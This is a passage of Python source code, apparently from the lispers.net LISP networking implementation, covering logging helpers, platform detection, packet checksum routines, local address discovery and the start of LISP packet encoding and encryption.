fd.write("traceback.print_last(file=fd) failed")
#endtry
try:
traceback.print_last()
except:
print("traceback.print_last() failed")
#endtry
fd.close()
return
#enddef
#
# lisp_set_exception
#
# Set exception callback to call lisp.lisp_record_traceback().
#
def lisp_set_exception():
sys.excepthook = lisp_record_traceback
return
#enddef
#
# lisp_is_raspbian
#
# Return True if this system is running Raspbian on a Raspberry Pi machine.
#
def lisp_is_raspbian():
if (distro.linux_distribution()[0] != "debian"): return(False)
return(platform.machine() in ["armv6l", "armv7l"])
#enddef
#
# lisp_is_ubuntu
#
# Return True if this system is running Ubuntu Linux.
#
def lisp_is_ubuntu():
return(distro.linux_distribution()[0] == "Ubuntu")
#enddef
#
# lisp_is_fedora
#
# Return True if this system is running Fedora Linux.
#
def lisp_is_fedora():
return(distro.linux_distribution()[0] == "fedora")
#enddef
#
# lisp_is_centos
#
# Return True if this system is running CentOS Linux.
#
def lisp_is_centos():
return(distro.linux_distribution()[0] == "centos")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian():
return(distro.linux_distribution()[0] == "debian")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian_kali():
return(distro.linux_distribution()[0] == "Kali")
#enddef
#
# lisp_is_macos
#
# Return True if this system is running MacOS operating system.
#
def lisp_is_macos():
return(platform.uname()[0] == "Darwin")
#enddef
#
# lisp_is_alpine
#
# Return True if this system is running the Apline Linux operating system.
#
def lisp_is_alpine():
return(os.path.exists("/etc/alpine-release"))
#enddef
#
# lisp_is_x86
#
# Return True if this process is an x86 little-endian machine.
#
def lisp_is_x86():
cpu = platform.machine()
return(cpu in ("x86", "i686", "x86_64"))
#enddef
#
# lisp_is_linux
#
# Return True if this is a ubuntu or fedora system.
#
def lisp_is_linux():
return(platform.uname()[0] == "Linux")
#enddef
#
# lisp_is_python2
#
# Return True if this code is running Python 2.7.x.
#
def lisp_is_python2():
ver = sys.version.split()[0]
return(ver[0:3] == "2.7")
#enddef
#
# lisp_is_python3
#
# Return True if this code is running Python 3.x.x.
#
def lisp_is_python3():
ver = sys.version.split()[0]
return(ver[0:2] == "3.")
#enddef
#
# lisp_on_aws
#
# Return True if this node is running in an Amazon VM on AWS.
#
def lisp_on_aws():
vm = getoutput("sudo dmidecode -s bios-vendor")
if (vm.find("command not found") != -1 and lisp_on_docker()):
aws = bold("AWS check", False)
lprint("{} - dmidecode not installed in docker container".format(aws))
#endif
return(vm.lower().find("amazon") != -1)
#enddef
#
# lisp_on_gcp
#
# Return True if this node is running in an Google Compute Engine VM.
#
def lisp_on_gcp():
vm = getoutput("sudo dmidecode -s bios-version")
return(vm.lower().find("google") != -1)
#enddef
#
# lisp_on_docker
#
# Are we in a docker container?
#
def lisp_on_docker():
return(os.path.exists("/.dockerenv"))
#enddef
#
# lisp_process_logfile
#
# Check to see if logfile exists. If not, it is startup time to create one
# or another procedure rotated the file out of the directory.
#
def lisp_process_logfile():
logfile = "./logs/lisp-{}.log".format(lisp_log_id)
if (os.path.exists(logfile)): return
sys.stdout.close()
sys.stdout = open(logfile, "a")
lisp_print_banner(bold("logfile rotation", False))
return
#enddef
#
# lisp_i_am
#
# The individual components tell the libraries who they are so we can prefix
# the component name for print() and logs().
#
def lisp_i_am(name):
global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
global lisp_hostname
lisp_log_id = name
if (name == "itr"): lisp_i_am_itr = True
if (name == "etr"): lisp_i_am_etr = True
if (name == "rtr"): lisp_i_am_rtr = True
if (name == "mr"): lisp_i_am_mr = True
if (name == "ms"): lisp_i_am_ms = True
if (name == "ddt"): lisp_i_am_ddt = True
if (name == "core"): lisp_i_am_core = True
#
# Set hostname to normalize dino-macbook.local or dino-macbook.wp.comcast.
# net to "dino-macbook".
#
lisp_hostname = socket.gethostname()
index = lisp_hostname.find(".")
if (index != -1): lisp_hostname = lisp_hostname[0:index]
return
#enddef
#
# lprint
#
# Print with timestamp and component name prefixed. If "force" is any argument,
# then we don't care about the lisp_debug_logging setting and a log message
# is issued.
#
def lprint(*args):
force = ("force" in args)
if (lisp_debug_logging == False and force == False): return
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print("{}: {}:".format(ts, lisp_log_id), end=" ")
for arg in args:
if (arg == "force"): continue
print(arg, end=" ")
#endfor
print()
try: sys.stdout.flush()
except: pass
return
#enddef
#
# fprint
#
# Do a lprint() when debug logging is off but "force" flag is supplied and
# can print messages..
#
def fprint(*args):
nargs = args + ("force",)
lprint(*nargs)
return
#enddef
#
# dprint
#
# Data-plane logging. Call lprint() only if lisp.lisp_data_plane_logging is
# True.
#
def dprint(*args):
if (lisp_data_plane_logging): lprint(*args)
return
#enddef
#
# cprint
#
# Print the class instance.
#
def cprint(instance):
print("{}:".format(instance))
pprint.pprint(instance.__dict__)
#enddef
#
# debug
#
# Used for debugging. Used to find location of temporary "printf" code so it
# can be removed for production code.
#
def debug(*args):
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print(red(">>>", False), end=" ")
print("{}:".format(ts), end=" ")
for arg in args: print(arg, end=" ")
print(red("<<<\n", False))
try: sys.stdout.flush()
except: pass
return
#enddef
#
# lisp_print_caller
#
# Print out calling stack.
#
def lisp_print_caller():
fprint(traceback.print_last())
#enddef
#
# lisp_print_banner
#
# Print out startup and shutdown banner.
#
def lisp_print_banner(string):
global lisp_version, lisp_hostname
if (lisp_version == ""):
lisp_version = getoutput("cat lisp-version.txt")
#endif
hn = bold(lisp_hostname, False)
lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
datetime.datetime.now(), lisp_version, hn))
return
#enddef
#
# green
#
# For printing banner.
#
def green(string, html):
if (html): return('<font color="green"><b>{}</b></font>'.format(string))
return(bold("\033[92m" + string + "\033[0m", html))
#enddef
#
# green_last_sec
#
# For printing packets in the last 1 second.
#
def green_last_sec(string):
return(green(string, True))
#enddef
#
# green_last_minute
#
# For printing packets in the last 1 minute.
#
def green_last_min(string):
return('<font color="#58D68D"><b>{}</b></font>'.format(string))
#enddef
#
# red
#
# For printing banner.
#
def red(string, html):
if (html): return('<font color="red"><b>{}</b></font>'.format(string))
return(bold("\033[91m" + string + "\033[0m", html))
#enddef
#
# blue
#
# For printing distinguished-name AFIs.
#
def blue(string, html):
if (html): return('<font color="blue"><b>{}</b></font>'.format(string))
return(bold("\033[94m" + string + "\033[0m", html))
#enddef
#
# bold
#
# For printing banner.
#
def bold(string, html):
if (html): return("<b>{}</b>".format(string))
return("\033[1m" + string + "\033[0m")
#enddef
#
# convert_font
#
# Converts from text baesd bold/color to HTML bold/color.
#
def convert_font(string):
escapes = [ ["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold] ]
right = "[0m"
for e in escapes:
left = e[0]
color = e[1]
offset = len(left)
index = string.find(left)
if (index != -1): break
#endfor
while (index != -1):
end = string[index::].find(right)
bold_string = string[index+offset:index+end]
string = string[:index] + color(bold_string, True) + \
string[index+end+offset::]
index = string.find(left)
#endwhile
#
# Call this function one more time if a color was in bold.
#
if (string.find("[1m") != -1): string = convert_font(string)
return(string)
#enddef
#
# lisp_space
#
# Put whitespace in URL encoded string.
#
def lisp_space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_button
#
# Return string of a LISP html button.
#
def lisp_button(string, url):
b = '<button style="background-color:transparent;border-radius:10px; ' + \
'type="button">'
if (url == None):
html = b + string + "</button>"
else:
a = '<a href="{}">'.format(url)
s = lisp_space(2)
html = s + a + b + string + "</button></a>" + s
#endif
return(html)
#enddef
#
# lisp_print_cour
#
# Print in HTML Courier-New font.
#
def lisp_print_cour(string):
output = '<font face="Courier New">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_print_sans
#
# Print in HTML Sans-Serif font.
#
def lisp_print_sans(string):
output = '<font face="Sans-Serif">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_span
#
# Print out string when a pointer hovers over some text.
#
def lisp_span(string, hover_string):
output = '<span title="{}">{}</span>'.format(hover_string, string)
return(output)
#enddef
#
# lisp_eid_help_hover
#
# Create hover title for any input EID form.
#
def lisp_eid_help_hover(output):
eid_help_str = \
'''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# lisp_geo_help_hover
#
# Create hover title for any input Geo or EID form.
#
def lisp_geo_help_hover(output):
eid_help_str = \
'''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# space
#
# Put whitespace in URL encoded string.
#
def space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_get_ephemeral_port
#
# Select random UDP port for use of a source port in a Map-Request and
# destination port in a Map-Reply.
#
def lisp_get_ephemeral_port():
return(random.randrange(32768, 65535))
#enddef
#
# lisp_get_data_nonce
#
# Get a 24-bit random nonce to insert in data header.
#
def lisp_get_data_nonce():
return(random.randint(0, 0xffffff))
#enddef
#
# lisp_get_control_nonce
#
# Get a 64-bit random nonce to insert in control packets.
#
def lisp_get_control_nonce():
return(random.randint(0, (2**64)-1))
#enddef
#
# lisp_hex_string
#
# Take an integer, either 16, 32, or 64 bits in width and return a hex string.
# But don't return the leading "0x". And don't return a trailing "L" if the
# integer is a negative 64-bit value (high-order bit set).
#
def lisp_hex_string(integer_value):
value = hex(integer_value)[2::]
if (value[-1] == "L"): value = value[0:-1]
return(value)
#enddef
#
# lisp_get_timestamp
#
# Use time library to get a current timestamp.
#
def lisp_get_timestamp():
return(time.time())
#enddef
lisp_uptime = lisp_get_timestamp()
#
# lisp_set_timestamp
#
# Use time library to set time into the future.
#
def lisp_set_timestamp(seconds):
return(time.time() + seconds)
#enddef
#
# lisp_print_elapsed
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_elapsed(ts):
if (ts == 0 or ts == None): return("never")
elapsed = time.time() - ts
elapsed = round(elapsed, 0)
return(str(datetime.timedelta(seconds=elapsed)))
#enddef
#
# lisp_print_future
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_future(ts):
if (ts == 0): return("never")
future = ts - time.time()
if (future < 0): return("expired")
future = round(future, 0)
return(str(datetime.timedelta(seconds=future)))
#enddef
#
# lisp_print_eid_tuple
#
# Prints in html or returns a string of the following combinations:
#
# [<iid>]<eid>/<ml>
# <eid>/<ml>
# ([<iid>]<source-eid>/ml, [<iid>]<group>/ml)
#
# This is called by most of the data structure classes as "print_eid_tuple()".
#
def lisp_print_eid_tuple(eid, group):
eid_str = eid.print_prefix()
if (group.is_null()): return(eid_str)
group_str = group.print_prefix()
iid = group.instance_id
if (eid.is_null() or eid.is_exact_match(group)):
index = group_str.find("]") + 1
return("[{}](*, {})".format(iid, group_str[index::]))
#endif
sg_str = eid.print_sg(group)
return(sg_str)
#enddef
#
# lisp_convert_6to4
#
# IPC messages will store an IPv4 address in an IPv6 "::ffff:<ipv4-addr>"
# format since we have a udp46 tunnel open. Convert it an IPv4 address.
#
def lisp_convert_6to4(addr_str):
if (addr_str.find("::ffff:") == -1): return(addr_str)
addr = addr_str.split(":")
return(addr[-1])
#enddef
#
# lisp_convert_4to6
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
# Returns a lisp_address().
#
def lisp_convert_4to6(addr_str):
addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
addr.store_address(addr_str)
return(addr)
#enddef
#
# lisp_gethostbyname
#
# Return an address if string is a name or address. If socket.gethostbyname()
# fails, try socekt.getaddrinfo(). We may be running on Alpine Linux which
# doesn't return DNS names with gethostbyname().
#
def lisp_gethostbyname(string):
ipv4 = string.split(".")
ipv6 = string.split(":")
mac = string.split("-")
if (len(ipv4) == 4):
if (ipv4[0].isdigit() and ipv4[1].isdigit() and ipv4[2].isdigit() and
ipv4[3].isdigit()): return(string)
#endif
if (len(ipv6) > 1):
try:
int(ipv6[0], 16)
return(string)
except:
pass
#endtry
#endif
#
# Make sure there are hex digits between dashes, otherwise could be a
# valid DNS name with dashes.
#
if (len(mac) == 3):
for i in range(3):
try: int(mac[i], 16)
except: break
#endfor
#endif
try:
addr = socket.gethostbyname(string)
return(addr)
except:
if (lisp_is_alpine() == False): return("")
#endtry
#
# Try different approach on Alpine.
#
try:
addr = socket.getaddrinfo(string, 0)[0]
if (addr[3] != string): return("")
addr = addr[4][0]
except:
addr = ""
#endtry
return(addr)
#enddef
#
# lisp_ip_checksum
#
# Input to this function is 20-bytes in packed form. Calculate IP header
# checksum and place in byte 10 and byte 11 of header.
#
def lisp_ip_checksum(data, hdrlen=20):
if (len(data) < hdrlen):
lprint("IPv4 packet too short, length {}".format(len(data)))
return(data)
#endif
ip = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, hdrlen*2, 4):
checksum += int(ip[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
ip = data[0:10] + checksum + data[12::]
return(ip)
#enddef
#
# lisp_icmp_checksum
#
# Checksum a ICMP Destination Unreachable Too Big message. It will staticly
# checksum 36 bytes.
#
def lisp_icmp_checksum(data):
if (len(data) < 36):
lprint("ICMP packet too short, length {}".format(len(data)))
return(data)
#endif
icmp = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 36, 4):
checksum += int(icmp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 2 and 4.
#
checksum = struct.pack("H", checksum)
icmp = data[0:2] + checksum + data[4::]
return(icmp)
#enddef
#
# lisp_udp_checksum
#
# Calculate the UDP pseudo header checksum. The variable 'data' is a UDP
# packet buffer starting with the UDP header with the checksum field zeroed.
#
# What is returned is the UDP packet buffer with a non-zero/computed checksum.
#
# The UDP pseudo-header is prepended to the UDP packet buffer which the
# checksum runs over:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Source Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Destination Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Upper-Layer Packet Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | zero | Next Header |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_udp_checksum(source, dest, data):
#
# Build pseudo-header for IPv6.
#
s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
udplen = socket.htonl(len(data))
next_header = socket.htonl(LISP_UDP_PROTOCOL)
pheader = s.pack_address()
pheader += d.pack_address()
pheader += struct.pack("II", udplen, next_header)
#
# Append UDP packet to pseudo-header. Add zeros to make 4 byte aligned.
#
udp = binascii.hexlify(pheader + data)
add = len(udp) % 4
for i in range(0,add): udp += "0"
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, len(udp), 4):
checksum += int(udp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at last 2 bytes of UDP header.
#
checksum = struct.pack("H", checksum)
udp = data[0:6] + checksum + data[8::]
return(udp)
#enddef
#
# lisp_igmp_checksum
#
# Comppute IGMP checksum. This is specialzed for an IGMP query 12-byte
# header.
#
def lisp_igmp_checksum(igmp):
g = binascii.hexlify(igmp)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 24, 4):
checksum += int(g[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
igmp = igmp[0:2] + checksum + igmp[4::]
return(igmp)
#enddef
#
# lisp_get_interface_address
#
# Based on supplied interface device, return IPv4 local interface address.
#
def lisp_get_interface_address(device):
#
# Check for illegal device name.
#
if (device not in netifaces.interfaces()): return(None)
#
# Check if there are no IPv4 addresses assigned to interface.
#
addresses = netifaces.ifaddresses(device)
if (netifaces.AF_INET not in addresses): return(None)
#
# Find first private address.
#
return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
for addr in addresses[netifaces.AF_INET]:
addr_str = addr["addr"]
return_address.store_address(addr_str)
return(return_address)
#endfor
return(None)
#enddef
#
# lisp_get_input_interface
#
# Based on destination-MAC address of incoming pcap'ed packet, index into
# lisp_mymacs{} to get a interface name string (device name) for all
# interfaces that have the MAC address assigned.
#
# If dest-MAC is not us, look at source MAC to see if we are in a loopback
# situation testing application and xTR in the same system.
#
def lisp_get_input_interface(packet):
p = lisp_format_packet(packet[0:12])
macs = p.replace(" ", "")
da = macs[0:12]
sa = macs[12::]
try: my_sa = (sa in lisp_mymacs)
except: my_sa = False
if (da in lisp_mymacs): return(lisp_mymacs[da], sa, da, my_sa)
if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
return(["?"], sa, da, my_sa)
#enddef
#
# lisp_get_local_interfaces
#
# Go populate the lisp.myinterfaces{} dictionary array. Key is device ID
# returned by the netifaces API.
#
def lisp_get_local_interfaces():
for device in netifaces.interfaces():
interface = lisp_interface(device)
interface.add_interface()
#endfor
return
#enddef
#
# lisp_get_loopback_address
#
# Get first loopback address on device lo which is not 127.0.0.1.
#
def lisp_get_loopback_address():
for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
if (addr["peer"] == "127.0.0.1"): continue
return(addr["peer"])
#endif
return(None)
#enddef
#
# lisp_is_mac_string
#
# Return True if the supplied string parameter is iin form of "xxxx-xxxx-xxxx".
# The input prefix could be "xxxx-xxxx-xxxx/48".
#
def lisp_is_mac_string(mac_str):
mac = mac_str.split("/")
if (len(mac) == 2): mac_str = mac[0]
return(len(mac_str) == 14 and mac_str.count("-") == 2)
#enddef
#
# lisp_get_local_macs
#
# Walk all interfaces, and for each ethernet interface, put the MAC address
# as a key into lisp_mymacs with a value of array of interface names.
#
def lisp_get_local_macs():
for device in netifaces.interfaces():
#
# Ignore bogus interface names that containers may create. Allow
# interfaces ones with colons, dashes and alphanumeric characters.
#
d = device.replace(":", "")
d = device.replace("-", "")
if (d.isalnum() == False): continue
#
# Need this for EOS because a "pimreg" interface will crash the call
# to netifaces.ifaddresses("pimreg").
#
try:
parms = netifaces.ifaddresses(device)
except:
continue
#endtry
if (netifaces.AF_LINK not in parms): continue
mac = parms[netifaces.AF_LINK][0]["addr"]
mac = mac.replace(":", "")
#
# GRE tunnels have strange MAC addresses (less than 48-bits). Ignore
# them.
#
if (len(mac) < 12): continue
if (mac not in lisp_mymacs): lisp_mymacs[mac] = []
lisp_mymacs[mac].append(device)
#endfor
lprint("Local MACs are: {}".format(lisp_mymacs))
return
#enddef
#
# lisp_get_local_rloc
#
# Use "ip addr show" on Linux and "ifconfig" on MacOS to get a local IPv4
# address. Get interface name from "netstat -rn" to grep for.
#
def lisp_get_local_rloc():
out = getoutput("netstat -rn | egrep 'default|0.0.0.0'")
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#
# Get last item on first line of output.
#
out = out.split("\n")[0]
device = out.split()[-1]
addr = ""
macos = lisp_is_macos()
if (macos):
out = getoutput("ifconfig {} | egrep 'inet '".format(device))
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
else:
cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
out = getoutput(cmd)
if (out == ""):
cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
out = getoutput(cmd)
#endif
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#endif
#
# Check for multi-line. And favor returning private address so NAT
# traversal is used in lig.
#
addr = ""
out = out.split("\n")
for line in out:
a = line.split()[1]
if (macos == False): a = a.split("/")[0]
address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
return(address)
#endif
return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
#endif
#
# lisp_get_local_addresses
#
# Use netifaces module to get a IPv4 and IPv6 local RLOC of this system.
# Return an array of 2 elements where [0] is an IPv4 RLOC and [1] is an
# IPv6 RLOC.
#
# Stores data in lisp.lisp_myrlocs[].
#
def lisp_get_local_addresses():
global lisp_myrlocs
#
# Check to see if we should not get the first address. Use environment
# variable (1-based addressing) to determine which one to get. If the
# number of addresses are less than the index, use the last one.
#
# The format of the environment variable could be <number> or
# <device>:<number>. The format could also be "<device>:" but make sure
# the user typed in a ":".
#
device_select = None
index = 1
parm = os.getenv("LISP_ADDR_SELECT")
if (parm != None and parm != ""):
parm = parm.split(":")
if (len(parm) == 2):
device_select = parm[0]
index = parm[1]
else:
if (parm[0].isdigit()):
index = parm[0]
else:
device_select = parm[0]
#endif
#endif
index = 1 if (index == "") else int(index)
#endif
rlocs = [None, None, None]
rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
device_iid = None
for device in netifaces.interfaces():
if (device_select != None and device_select != device): continue
addresses = netifaces.ifaddresses(device)
if (addresses == {}): continue
#
# Set instance-ID for interface.
#
device_iid = lisp_get_interface_instance_id(device, None)
#
# Look for a non-link-local and non-loopback address.
#
if (netifaces.AF_INET in addresses):
ipv4 = addresses[netifaces.AF_INET]
count = 0
for addr in ipv4:
rloc4.store_address(addr["addr"])
if (rloc4.is_ipv4_loopback()): continue
if (rloc4.is_ipv4_link_local()): continue
if (rloc4.address == 0): continue
count += 1
rloc4.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
rlocs[0] = rloc4
if (count == index): break
#endfor
#endif
if (netifaces.AF_INET6 in addresses):
ipv6 = addresses[netifaces.AF_INET6]
count = 0
for addr in ipv6:
addr_str = addr["addr"]
rloc6.store_address(addr_str)
if (rloc6.is_ipv6_string_link_local(addr_str)): continue
if (rloc6.is_ipv6_loopback()): continue
count += 1
rloc6.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
rlocs[1] = rloc6
if (count == index): break
#endfor
#endif
#
# Did we find an address? If not, loop and get the next interface.
#
if (rlocs[0] == None): continue
rlocs[2] = device
break
#endfor
addr1 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
addr2 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
device = rlocs[2] if rlocs[2] else "none"
device_select = " (user selected)" if device_select != None else ""
addr1 = red(addr1, False)
addr2 = red(addr2, False)
device = bold(device, False)
lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}". \
format(addr1, addr2, device, device_select, device_iid))
lisp_myrlocs = rlocs
return((rlocs[0] != None))
#enddef
#
# lisp_get_all_addresses
#
# Return a list of all local IPv4 and IPv6 addresses from kernel. This is
# going to be used for building pcap and iptables filters. So no loopback or
# link-local addresses are returned.
#
def lisp_get_all_addresses():
address_list = []
for interface in netifaces.interfaces():
try: entry = netifaces.ifaddresses(interface)
except: continue
if (netifaces.AF_INET in entry):
for addr in entry[netifaces.AF_INET]:
a = addr["addr"]
if (a.find("127.0.0.1") != -1): continue
address_list.append(a)
#endfor
#endif
if (netifaces.AF_INET6 in entry):
for addr in entry[netifaces.AF_INET6]:
a = addr["addr"]
if (a == "::1"): continue
if (a[0:5] == "fe80:"): continue
address_list.append(a)
#endfor
#endif
#endfor
return(address_list)
#enddef
#
# lisp_get_all_multicast_rles
#
# Grep lisp.config and get all multicast RLEs that appear in the configuration.
# Returns either an empty array or filled with one or more multicast addresses.
#
def lisp_get_all_multicast_rles():
rles = []
out = getoutput('egrep "rle-address =" ./lisp.config')
if (out == ""): return(rles)
lines = out.split("\n")
for line in lines:
if (line[0] == "#"): continue
rle = line.split("rle-address = ")[1]
rle_byte = int(rle.split(".")[0])
if (rle_byte >= 224 and rle_byte < 240): rles.append(rle)
#endfor
return(rles)
#enddef
#------------------------------------------------------------------------------
#
# LISP packet contents. This keeps state for a LISP encapsulated packet that
# is processed by an RTR and ETR.
#
class lisp_packet(object):
def __init__(self, packet):
self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_tos = 0
self.outer_ttl = 0
self.udp_sport = 0
self.udp_dport = 0
self.udp_length = 0
self.udp_checksum = 0
self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_sport = 0
self.inner_dport = 0
self.lisp_header = lisp_data_header()
self.packet = packet
self.inner_version = 0
self.outer_version = 0
self.encap_port = LISP_DATA_PORT
self.inner_is_fragment = False
self.packet_error = ""
self.gleaned_dest = False
#enddef
def encode(self, nonce):
#
# We could be running with no RLOCs found. If lisp_myrlocs[] is None,
# then self.outer_source will be LISP_AFI_NONE.
#
if (self.outer_source.is_null()): return(None)
#
# We have to build the LISP header here because if we are doing
# lisp-crypto, the ICV covers the LISP header. The function
# lisp_packet.encrypt() will put in the key-id.
#
if (nonce == None):
self.lisp_header.nonce(lisp_get_data_nonce())
elif (self.lisp_header.is_request_nonce(nonce)):
self.lisp_header.request_nonce(nonce)
else:
self.lisp_header.nonce(nonce)
#endif
self.lisp_header.instance_id(self.inner_dest.instance_id)
#
# Encrypt the packet. If something went wrong, send unencrypted packet
# by telling RLOC with key-id 0. For now, just use key-id 1. We are
# supporting just a single key.
#
self.lisp_header.key_id(0)
control = (self.lisp_header.get_instance_id() == 0xffffff)
if (lisp_data_plane_security and control == False):
addr_str = self.outer_dest.print_address_no_iid() + ":" + \
str(self.encap_port)
if (addr_str in lisp_crypto_keys_by_rloc_encap):
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]):
keys[1].use_count += 1
packet, encrypted = self.encrypt(keys[1], addr_str)
if (encrypted): self.packet = packet
#endif
#endif
#endif
#
# Start with UDP header. Call hash_packet() to set source-port value.
# Unless we are doing lisp-crypto and nat-traversal.
#
self.udp_checksum = 0
if (self.encap_port == LISP_DATA_PORT):
if (lisp_crypto_ephem_port == None):
if (self.gleaned_dest):
self.udp_sport = LISP_DATA_PORT
else:
self.hash_packet()
#endif
else:
self.udp_sport = lisp_crypto_ephem_port
#endif
else:
self.udp_sport = LISP_DATA_PORT
#endif
self.udp_dport = self.encap_port
self.udp_length = len(self.packet) + 16
#
# Swap UDP port numbers and length field since they are 16-bit values.
#
sport = socket.htons(self.udp_sport)
dport = socket.htons(self.udp_dport)
udp_len = socket.htons(self.udp_length)
udp = struct.pack("HHHH", sport, dport, udp_len, self.udp_checksum)
#
# Encode the LISP header.
#
lisp = self.lisp_header.encode()
#
# Now prepend all 3 headers, LISP, UDP, outer header. See lisp_packet.
# fix_outer_header() for byte-swap details for the frag-offset field.
#
if (self.outer_version == 4):
tl = socket.htons(self.udp_length + 20)
frag = socket.htons(0x4000)
outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
frag, self.outer_ttl, 17, 0)
outer += self.outer_source.pack_address()
outer += self.outer_dest.pack_address()
outer = lisp_ip_checksum(outer)
elif (self.outer_version == 6):
outer = b""
# short = 6 << 12
# short |= self.outer_tos << 4
# short = socket.htons(short)
# tl = socket.htons(self.udp_length)
# outer = struct.pack("HHHBB", short, 0, tl, 17, self.outer_ttl)
# outer += self.outer_source.pack_address()
# outer += self.outer_dest.pack_address()
else:
return(None)
#endif
self.packet = outer + udp + lisp + self.packet
return(self)
#enddef
def cipher_pad(self, packet):
length = len(packet)
if ((length % 16) != 0):
pad = (old_div(length, 16) + 1) * 16
packet = packet.ljust(pad)
#endif
return(packet)
#enddef
def encrypt(self, key, addr_str):
if (key == None or key.shared_key == None):
return([self.packet, False])
#endif
#
# Pad packet to multiple of 16 bytes and call AES cipher.
#
packet = self.cipher_pad(self.packet)
iv = key.get_iv()
